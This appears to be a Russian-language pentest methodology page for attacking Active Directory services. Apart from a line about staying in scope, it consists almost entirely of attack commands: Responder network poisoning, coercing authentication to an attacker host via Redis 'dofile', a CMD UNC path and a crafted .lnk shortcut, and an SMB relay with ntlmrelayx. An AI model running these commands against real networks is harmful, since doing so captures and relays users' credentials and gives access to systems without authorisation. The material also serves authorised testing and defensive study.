Active Directory (сервисы)

:::tip Формат страницы

Порядок действий описан по‑русски. В методике сохранены заголовки (частично локализованы типовые термины), таблицы, иллюстрации и блоки кода: команды и параметры на английском, без перевода синтаксиса.

:::

Порядок действий

Убедитесь, что целевой сервис и порт входят в согласованный scope.
Выполните перечисление: версия, баннеры, доступные команды и скрипты.
Проверьте типовые слабости и сценарии из раздела, документируя каждый шаг.
Команды в блоках кода используйте без перевода синтаксиса.

Методика

Введение

AD Object structure

Poison the network

sudo responder -I <NETWORK_INTERFACE> -Prdwv

Triggering responder

Redis

redis-cli -h <IP> -p <PORT> eval "dofile('//<ATTACKER_IP>//share')" 0

CMD

C:\Users\victim> \\<ATTACKER_IP>\

Windows shortcut

./mslink_v1.3.sh -l name -n shortcut -i \\\\<ATTACKER_IP>\\a -o out.lnk

SMB Relay Attack

nmap --script=smb2-security-mode.nse -p445 -Pn <VICTIMS_IP>

sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf
responder.py -I eth0 -wdr -v

ntlmrelayx -tf <TARGET> -smb2support -i

Порядок действий​

Методика​

Введение​

Poison the network​

Triggering responder​

Redis​

CMD​

Windows shortcut​

SMB Relay Attack​

Ссылки​